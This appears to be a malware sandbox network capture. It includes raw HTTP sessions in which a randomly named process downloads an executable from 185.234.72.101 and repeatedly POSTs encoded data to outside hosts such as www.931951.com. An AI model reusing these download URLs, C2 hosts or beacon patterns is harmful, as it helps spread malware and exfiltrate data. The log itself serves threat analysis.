                                                                            Jun 19, 2024 22:40:13.718461990 CEST1236INData Raw: 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22
                                                                            Data Ascii: butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4545" d="m 83.12978,122.92016 c -2.601311,10.56131 -5.214983,21.17282 -7.40283,31.41665 -2.187847,10.24384 -3.955407,20.14218 -5.074975,26.03483
                                                                            Jun 19, 2024 22:40:13.718496084 CEST1236INData Raw: 20 33 2e 37 37 30 39 31 36 2c 30 2e 35 33 30 32 34 20 37 2e 38 39 36 35 37 2c 30 2e 37 36 35 39 39 20 31 31 2e 36 30 38 35 33 35 2c 30 2e 38 38 33 38 32 20 33 2e 37 31 31 39 36 35 2c 30 2e 31 31 37 38 32 20 37 2e 30 31 32 35 34 38 2c 30 2e 31 31
                                                                            Data Ascii: 3.770916,0.53024 7.89657,0.76599 11.608535,0.88382 3.711965,0.11782 7.012548,0.11782 10.429711,0.0589 3.417163,-0.0589 6.953769,-0.17681 10.606588,-0.23572 3.652818,-0.0589 7.425155,-0.0589 11.137027,-0.23569 3.711875,-0.17679 7.366225,-0.530
                                                                            Jun 19, 2024 22:40:13.718534946 CEST1236INData Raw: 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 2d 72 75 6c 65 3a 6e 6f 6e 7a 65 72 6f 3b 73 74 72 6f 6b 65 3a
                                                                            Data Ascii: le="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <ellipse ry="4.3158579" rx="4
                                                                            Jun 19, 2024 22:40:13.723939896 CEST1236INData Raw: 32 36 31 32 31 20 36 2e 36 31 37 30 32 2c 30 2e 31 33 30 31 20 7a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b
                                                                            Data Ascii: 26121 6.61702,0.1301 z" style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path transform="


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            20192.168.2.449764162.0.213.94805740C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 19, 2024 22:40:15.470191002 CEST431OUTGET /e20q/?tF1tk6=WPritX3A9R+ySLDGPku/GD0rpC4O61Hw5+tRT3chZ2wpNsEUE7uyewm5xlmwIO2sKs7uf3/86JENB8xtRbvRL6LWdHBkCM2rbaWuRFm/Az6wkZG2Vj0/zBQ=&8FiTp=kJrtnVsPEnF0JV HTTP/1.1
                                                                            Host: www.lenovest.xyz
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Jun 19, 2024 22:40:16.099117041 CEST250INHTTP/1.1 200 OK
                                                                            Date: Wed, 19 Jun 2024 20:40:15 GMT
                                                                            Server: Apache
                                                                            Vary: Accept-Encoding
                                                                            Content-Length: 76
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Data Raw: 55 50 33 34 77 48 50 46 6c 78 32 6e 42 4b 43 43 4b 33 50 66 42 32 64 2f 71 32 78 58 6d 43 47 38 6d 5a 6f 4c 44 69 31 39 45 78 73 2f 5a 4e 68 2f 49 36 43 79 54 42 69 55 37 67 79 32 4e 70 44 45 46 64 6e 65 64 55 75 41 37 41 3d 3d
                                                                            Data Ascii: UP34wHPFlx2nBKCCK3PfB2d/q2xXmCG8mZoLDi19Exs/ZNh/I6CyTBiU7gy2NpDEFdnedUuA7A==


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            21192.168.2.449765185.234.72.101808036C:\Windows\SysWOW64\compact.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 19, 2024 22:40:17.162128925 CEST196OUTGET /OdR8akYyHwr3ISR.exe HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Host: 185.234.72.101
                                                                            Connection: Keep-Alive
                                                                            Cache-Control: no-cache
                                                                            Jun 19, 2024 22:40:17.807693005 CEST1236INHTTP/1.1 200 OK
                                                                            Date: Wed, 19 Jun 2024 20:40:17 GMT
                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                            Last-Modified: Tue, 18 Jun 2024 06:38:34 GMT
                                                                            ETag: "a9e00-61b2454b3e108"
                                                                            Accept-Ranges: bytes
                                                                            Content-Length: 695808
                                                                            Keep-Alive: timeout=5, max=100
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-msdownload
                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 1f af 78 c5 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 94 0a 00 00 08 00 00 00 00 00 00 72 b3 0a 00 00 20 00 00 00 c0 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 1e b3 0a 00 4f 00 00 00 00 c0 0a 00 cc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0a 00 0c 00 00 00 c0 90 0a 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELx0r @ @Op H.text `.rsrc@@.reloc@BRHxDp}(({o*"(*01{o ,{o+{o*0{o!rp(",rp(#&8{o!rp(",r-p(#&8`{o!rp(",r_p(#&85{o!rp(",rp(#&8{o!rp("
                                                                            Jun 19, 2024 22:40:17.807751894 CEST1236INData Raw: 00 00 0a 13 04 11 04 2c 12 00 72 bd 00 00 70 28 23 00 00 0a 26 00 38 dd 01 00 00 02 7b 0b 00 00 04 6f 24 00 00 0a 13 06 12 06 28 25 00 00 0a 13 06 12 06 28 26 00 00 0a 28 27 00 00 0a 13 06 12 06 28 25 00 00 0a 13 06 12 06 28 26 00 00 0a 28 22 00
                                                                            Data Ascii: ,rp(#&8{o$(%(&('(%(&(",rp(#&8{o(-{o(+,r;p(#&8V{o!rp(",r[p(#&8){o!{o!(),r
                                                                            Jun 19, 2024 22:40:17.807789087 CEST1236INData Raw: 00 00 0a 02 7b 08 00 00 04 6f 38 00 00 0a 00 02 7b 02 00 00 04 6f 37 00 00 0a 02 7b 09 00 00 04 6f 38 00 00 0a 00 02 7b 02 00 00 04 6f 37 00 00 0a 02 7b 0a 00 00 04 6f 38 00 00 0a 00 02 7b 02 00 00 04 72 5d 02 00 70 22 00 00 34 41 17 19 16 73 39
                                                                            Data Ascii: {o8{o7{o8{o7{o8{r]p"4As9o:{#s;o<{r}po={ s>o?{o@{oA{rpoB{~ s;o<{rpo={
                                                                            Jun 19, 2024 22:40:17.807821989 CEST1236INData Raw: 00 02 7b 0c 00 00 04 1f 2c 20 02 01 00 00 73 3b 00 00 0a 6f 3c 00 00 0a 00 02 7b 0c 00 00 04 72 4f 04 00 70 6f 3d 00 00 0a 00 02 7b 0c 00 00 04 1f 66 1f 10 73 3e 00 00 0a 6f 3f 00 00 0a 00 02 7b 0c 00 00 04 1f 0a 6f 40 00 00 0a 00 02 7b 0c 00 00
                                                                            Data Ascii: {, s;o<{rOpo={fs>o?{o@{r]poB{ s;o<{rypo={*oL{ s>o?{o@{oF{ s;o<{rpo=
                                                                            Jun 19, 2024 22:40:17.807857037 CEST1236INData Raw: 00 00 0a 00 02 28 37 00 00 0a 02 7b 02 00 00 04 6f 38 00 00 0a 00 02 72 db 05 00 70 28 3d 00 00 0a 00 02 17 28 51 00 00 0a 00 02 72 91 02 00 70 6f 42 00 00 0a 00 02 02 fe 06 02 00 00 06 73 52 00 00 0a 28 53 00 00 0a 00 02 7b 02 00 00 04 16 6f 54
                                                                            Data Ascii: (7{o8rp(=(QrpoBsR(S{oT{oU(T*0L}(V(W(sX(YoZ([o\(]*0}(^(_,5(
                                                                            Jun 19, 2024 22:40:17.807893991 CEST1236INData Raw: 28 6b 00 00 0a 00 02 72 41 06 00 70 28 6d 00 00 0a 00 02 17 28 73 00 00 0a 00 02 17 6f 78 00 00 0a 00 02 73 83 00 00 06 7d 17 00 00 04 02 28 59 00 00 0a 02 7b 17 00 00 04 6f 67 00 00 0a 00 2a 00 13 30 01 00 07 00 00 00 01 00 00 11 00 16 0a 2b 00
                                                                            Data Ascii: (krAp(m(soxs}(Y{og*0+*0o,(*0{ssssolooo&oooo9s|s|
                                                                            Jun 19, 2024 22:40:17.807929039 CEST1236INData Raw: 70 28 23 00 00 0a 26 00 2a 13 30 03 00 33 00 00 00 17 00 00 11 00 73 6a 00 00 06 0a 06 02 7b 2f 00 00 04 6f 21 00 00 0a 6f 66 00 00 06 0b 73 6a 00 00 06 0a 02 7b 31 00 00 04 06 07 6f 68 00 00 06 6f a3 00 00 0a 00 2a 00 13 30 01 00 16 00 00 00 18
                                                                            Data Ascii: p(#&*03sj{/o!ofsj{1oho*0s0o*(+*0+,{+,{o,(-*0{s.}s}s.}s/} s5}!s2}"
                                                                            Jun 19, 2024 22:40:17.807964087 CEST1236INData Raw: 0a 00 02 7b 22 00 00 04 72 ad 08 00 70 6f 42 00 00 0a 00 02 7b 23 00 00 04 6f 37 00 00 0a 02 7b 24 00 00 04 6f 38 00 00 0a 00 02 7b 23 00 00 04 6f 37 00 00 0a 02 7b 25 00 00 04 6f 38 00 00 0a 00 02 7b 23 00 00 04 6f 37 00 00 0a 02 7b 26 00 00 04
                                                                            Data Ascii: {"rpoB{#o7{$o8{#o7{%o8{#o7{&o8{#$ s;o<{#rpo={# ts>o?{#o@{#oA{#rpoB{$w9s;o<{$rpo={$
                                                                            Jun 19, 2024 22:40:17.808006048 CEST1224INData Raw: 00 00 0a 6f 3f 00 00 0a 00 02 7b 2c 00 00 04 17 6f 40 00 00 0a 00 02 7b 2d 00 00 04 17 6f 46 00 00 0a 00 02 7b 2d 00 00 04 1f 13 1f 4f 73 3b 00 00 0a 6f 3c 00 00 0a 00 02 7b 2d 00 00 04 72 31 05 00 70 6f 3d 00 00 0a 00 02 7b 2d 00 00 04 1f 50 1f
                                                                            Data Ascii: o?{,o@{-oF{-Os;o<{-r1po={-Ps>o?{-o@{-rpoB{.o7{/o8{.o7{0o8{.o7{1o8{. s;o<{.rupo={.
                                                                            Jun 19, 2024 22:40:17.808044910 CEST1236INData Raw: 00 13 30 01 00 16 00 00 00 1a 00 00 11 00 73 3e 00 00 06 0a 06 6f 2a 00 00 0a 00 02 28 2b 00 00 0a 00 2a 00 00 13 30 01 00 16 00 00 00 03 00 00 11 00 73 37 00 00 06 0a 06 6f 2a 00 00 0a 00 02 28 2b 00 00 0a 00 2a 00 00 13 30 02 00 2b 00 00 00 01
                                                                            Data Ascii: 0s>o*(+*0s7o*(+*0+,{3+,{3o,(-*0s}4s}5s}6s}7s}8{4o6(6{4o%{5%
                                                                            Jun 19, 2024 22:40:17.813281059 CEST1236INData Raw: 00 04 02 73 32 00 00 0a 7d 3f 00 00 04 02 73 2f 00 00 0a 7d 3d 00 00 04 02 73 b9 00 00 0a 7d 3c 00 00 04 02 7b 3b 00 00 04 6f 36 00 00 0a 00 02 28 36 00 00 0a 00 02 7b 3b 00 00 04 6f 37 00 00 0a 02 7b 3c 00 00 04 6f 38 00 00 0a 00 02 7b 3b 00 00
                                                                            Data Ascii: s2}?s/}=s}<{;o6(6{;o7{<o8{;o7{=o8{;o7{>o8{;o7{?o8{;o7{@o8{;o7{Ao8{;r]p"|As9o:{;a$s;o<


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            22192.168.2.449766172.82.177.221805740C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 19, 2024 22:40:21.462055922 CEST684OUTPOST /2ha1/ HTTP/1.1
                                                                            Host: www.931951.com
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 203
                                                                            Origin: http://www.931951.com
                                                                            Referer: http://www.931951.com/2ha1/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Data Raw: 74 46 31 74 6b 36 3d 6d 34 43 65 79 48 49 64 63 33 56 6a 35 4c 78 34 46 4c 44 5a 39 58 2f 62 55 34 42 50 54 47 57 31 44 4d 71 54 35 6e 2b 4b 42 79 55 52 6a 6d 32 6d 63 52 4a 77 38 4f 4a 43 48 5a 33 67 33 79 62 54 4b 34 75 37 31 41 55 52 67 33 62 57 4b 6a 7a 54 47 71 56 66 4c 6b 4c 32 35 37 52 6a 76 6e 59 64 64 38 5a 66 59 5a 78 79 43 45 2b 32 65 43 46 70 68 6b 48 34 49 38 4a 4a 74 51 36 66 73 2b 77 77 61 44 68 53 51 65 7a 75 7a 33 4d 37 46 59 73 6a 78 57 6d 44 5a 74 4a 33 4d 54 41 6a 6b 4c 46 48 79 69 34 63 55 35 43 45 65 66 32 31 42 41 45 37 71 77 78 68 42 33 4f 72 7a 71 35 78 43 58 37 48 63 67 3d 3d
                                                                            Data Ascii: tF1tk6=m4CeyHIdc3Vj5Lx4FLDZ9X/bU4BPTGW1DMqT5n+KByURjm2mcRJw8OJCHZ3g3ybTK4u71AURg3bWKjzTGqVfLkL257RjvnYdd8ZfYZxyCE+2eCFphkH4I8JJtQ6fs+wwaDhSQezuz3M7FYsjxWmDZtJ3MTAjkLFHyi4cU5CEef21BAE7qwxhB3Orzq5xCX7Hcg==


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            23192.168.2.449767172.82.177.221805740C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 19, 2024 22:40:23.998194933 CEST704OUTPOST /2ha1/ HTTP/1.1
                                                                            Host: www.931951.com
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 223
                                                                            Origin: http://www.931951.com
                                                                            Referer: http://www.931951.com/2ha1/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Data Raw: 74 46 31 74 6b 36 3d 6d 34 43 65 79 48 49 64 63 33 56 6a 34 71 42 34 4a 49 72 5a 34 33 2f 59 49 6f 42 50 63 6d 57 35 44 4d 6d 54 35 6d 37 48 43 41 77 52 67 43 36 6d 64 54 68 77 2f 4f 4a 43 4a 35 33 6c 34 53 62 61 4b 34 7a 59 31 41 59 52 67 33 50 57 4b 6d 33 54 46 64 35 59 4c 30 4c 34 73 72 52 6c 72 6e 59 64 64 38 5a 66 59 5a 6c 55 43 45 32 32 65 79 31 70 68 42 6e 2f 57 73 4a 47 71 51 36 66 6d 65 77 30 61 44 68 30 51 63 48 55 7a 31 30 37 46 5a 63 6a 79 48 6d 63 4b 4e 4a 78 42 7a 42 71 31 36 55 6c 33 68 70 38 65 66 54 68 57 75 54 52 4e 6d 56 68 37 42 51 32 54 33 71 59 75 74 77 46 50 55 47 4f 48 73 45 56 47 65 67 57 6b 39 6e 37 39 54 64 52 34 49 52 48 31 50 30 3d
                                                                            Data Ascii: tF1tk6=m4CeyHIdc3Vj4qB4JIrZ43/YIoBPcmW5DMmT5m7HCAwRgC6mdThw/OJCJ53l4SbaK4zY1AYRg3PWKm3TFd5YL0L4srRlrnYdd8ZfYZlUCE22ey1phBn/WsJGqQ6fmew0aDh0QcHUz107FZcjyHmcKNJxBzBq16Ul3hp8efThWuTRNmVh7BQ2T3qYutwFPUGOHsEVGegWk9n79TdR4IRH1P0=


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            24192.168.2.449768172.82.177.221805740C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 19, 2024 22:40:26.528857946 CEST10786OUTPOST /2ha1/ HTTP/1.1
                                                                            Host: www.931951.com
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 10303
                                                                            Origin: http://www.931951.com
                                                                            Referer: http://www.931951.com/2ha1/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Data Raw: 74 46 31 74 6b 36 3d 6d 34 43 65 79 48 49 64 63 33 56 6a 34 71 42 34 4a 49 72 5a 34 33 2f 59 49 6f 42 50 63 6d 57 35 44 4d 6d 54 35 6d 37 48 43 41 34 52 6a 78 79 6d 64 79 68 77 2b 4f 4a 43 42 5a 33 6b 34 53 61 49 4b 34 37 45 31 42 6b 72 67 30 33 57 4a 41 4c 54 45 70 74 59 46 30 4c 34 75 72 52 6b 76 6e 5a 66 64 38 4a 62 59 5a 31 55 43 45 32 32 65 77 74 70 6d 55 48 2f 55 73 4a 4a 74 51 36 4c 73 2b 77 63 61 44 4a 4b 51 63 54 45 77 42 49 37 46 35 4d 6a 7a 31 2b 63 4a 74 4a 7a 43 7a 42 79 31 36 59 54 33 6e 4e 4f 65 66 4f 4b 57 74 50 52 62 44 67 75 71 44 59 5a 42 32 54 45 77 50 38 77 4f 46 36 5a 45 38 73 65 4a 2f 30 54 6e 64 37 79 6d 79 38 4c 6f 74 52 61 30 66 46 52 42 78 37 39 78 79 36 6c 34 4d 51 55 4e 63 44 30 53 79 35 6c 79 30 41 7a 63 64 72 45 35 65 48 59 49 76 4d 30 31 4c 56 36 6f 4c 38 2f 63 68 73 66 44 56 59 5a 4b 38 58 46 70 67 75 69 58 48 78 41 64 76 48 69 6b 4b 42 57 4a 6e 69 37 55 44 6e 56 73 2f 74 66 52 30 6f 66 6c 39 48 72 70 2b 6a 47 4e 4a 54 30 30 77 64 64 52 49 37 33 74 48 4c 57 4f 44 62 [TRUNCATED]
                                                                            Data Ascii: tF1tk6=m4CeyHIdc3Vj4qB4JIrZ43/YIoBPcmW5DMmT5m7HCA4Rjxymdyhw+OJCBZ3k4SaIK47E1Bkrg03WJALTEptYF0L4urRkvnZfd8JbYZ1UCE22ewtpmUH/UsJJtQ6Ls+wcaDJKQcTEwBI7F5Mjz1+cJtJzCzBy16YT3nNOefOKWtPRbDguqDYZB2TEwP8wOF6ZE8seJ/0Tnd7ymy8LotRa0fFRBx79xy6l4MQUNcD0Sy5ly0AzcdrE5eHYIvM01LV6oL8/chsfDVYZK8XFpguiXHxAdvHikKBWJni7UDnVs/tfR0ofl9Hrp+jGNJT00wddRI73tHLWODbowwj9TbnDJJV2Wtx4weWfvdW2LxS5VD5uqtcH2GF2ie0HnFDxxJVUJ961XT0Vx4PtQXpSkko3VjcKyTq9pEXCNiTSdxKl0OXG5c8C+divRgaYiBNgPxU99BOFpmGwNE0Wt2BvWhjhqsjjHnpCrswpJQOk6bfMy1sC+X8PRKK59sOKCUDMIHuRaXAtuycTnzd0Iph9GFa0DsIGwk7zJTpg6qepT9rg6Au99GemkLnwk2hr23SvqxmDJs6U82TvTAC07lCs4HKDZMaWq9Owp86kOdGuEnvqE8CmkUPxtWlNB0Jm6V5bUGLkDkuZVu3SL7kUcbREBsmq3vtH9Zd82UwyAWoNugurLD7kegK+0s+CgKCmQOGsXH508UA/9ntr598BztWdGSqfhHVy2xVe8SJ/E8RrbhFvToOQbIq0waismlcVM9uO8554fPUUHoDkHH09an6vBFplmIeSB+ishH2FFbGSNL7i/LJ67/38g6ZvU2lDZxbJSxeb1SXw5fR4siH7qzpkwqpgXxN3mDgqYkMYqhvKpWoWwJlLpJ3plMJqis1F7dkqWITxkhw6UX7DwbyugJd5zJGqxEMTvEe7NrNv0JkB9Lf3J66/S7OYerAayXaerBbVPaoma+2xGJb7vYJqPdJhGXsvdxJThhQqANdOWnVY319sqtLt3 [TRUNCATED]


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            25192.168.2.449769172.82.177.221805740C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 19, 2024 22:40:29.074364901 CEST429OUTGET /2ha1/?8FiTp=kJrtnVsPEnF0JV&tF1tk6=r6q+x3A/FEQLw6gnIIDKqn7cXK90QEz4MeLNvFaSJRcJ7hS0Yil9+YspC9bp8TGkQ6fd6C5Pq3eWOBjFGqN2KETivrZrq09Pe+ZYF4dhJGLDVCdvvTj0Vf0= HTTP/1.1
                                                                            Host: www.931951.com
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Jun 19, 2024 22:40:29.645574093 CEST917INHTTP/1.1 200 OK
                                                                            Server: nginx
                                                                            Date: Wed, 19 Jun 2024 20:40:29 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 781
                                                                            Connection: close
                                                                            Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e cf f3 c9 bd d7 d0 d0 c5 d7 b0 ca ce b2 c4 c1 cf b9 ab cb be 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 20 2f 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 20 20 20 20 76 61 72 20 62 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 0d 0a 20 20 20 20 76 61 72 20 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2e 73 70 6c 69 74 28 27 3a 27 29 5b 30 5d 3b 0d 0a 20 20 20 20 69 66 20 28 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 3d 3d 20 27 68 74 74 70 73 27 29 20 7b 0d 0a 20 20 20 20 20 [TRUNCATED]
                                                                            Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><script>(function(){ var bp = document.createElement('script'); var curProtocol = window.location.protocol.split(':')[0]; if (curProtocol === 'https') { bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'; } else { bp.src = 'http://push.zhanzhang.baidu.com/push.js'; } var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s);})();</script></head><script language="javascript" type="text/javascript" src="/common.js"></script><script language="javascript" type="text/javascript" src="/tj.js"></script></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            26192.168.2.44977015.204.0.108805740C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 19, 2024 22:40:35.180716038 CEST702OUTPOST /egr4/ HTTP/1.1
                                                                            Host: www.srripaspocon.org
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 203
                                                                            Origin: http://www.srripaspocon.org
                                                                            Referer: http://www.srripaspocon.org/egr4/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Data Raw: 74 46 31 74 6b 36 3d 44 71 4f 37 69 67 79 4f 38 7a 75 6f 70 6e 38 54 51 6e 6c 52 42 47 51 78 79 37 65 32 78 51 54 49 64 74 6a 74 79 48 77 2f 39 59 46 72 58 78 36 5a 71 4a 72 71 4f 67 72 70 70 31 74 50 4e 35 4e 54 35 30 2f 4d 55 70 66 71 36 2f 50 39 6e 6d 53 56 49 4d 71 44 6c 42 76 4d 31 76 35 6f 2f 74 72 34 52 7a 71 56 6e 73 57 6a 58 30 4b 47 77 49 32 64 61 58 49 64 65 34 4a 51 5a 4e 4d 41 79 78 38 6c 2b 2f 56 47 77 34 75 42 58 33 44 31 78 63 31 31 41 6a 6d 67 32 38 38 41 33 64 76 4e 39 6d 49 71 43 44 5a 48 6c 41 36 41 77 66 55 57 48 6e 72 65 71 57 74 4f 50 74 5a 45 38 69 32 4c 78 64 37 5a 6c 41 3d 3d
                                                                            Data Ascii: tF1tk6=DqO7igyO8zuopn8TQnlRBGQxy7e2xQTIdtjtyHw/9YFrXx6ZqJrqOgrpp1tPN5NT50/MUpfq6/P9nmSVIMqDlBvM1v5o/tr4RzqVnsWjX0KGwI2daXIde4JQZNMAyx8l+/VGw4uBX3D1xc11Ajmg288A3dvN9mIqCDZHlA6AwfUWHnreqWtOPtZE8i2Lxd7ZlA==
                                                                            Jun 19, 2024 22:40:35.772183895 CEST1236INHTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            Pragma: no-cache
                                                                            Content-Type: text/html
                                                                            Content-Length: 1236
                                                                            Date: Wed, 19 Jun 2024 20:40:35 GMT
                                                                            Server: LiteSpeed
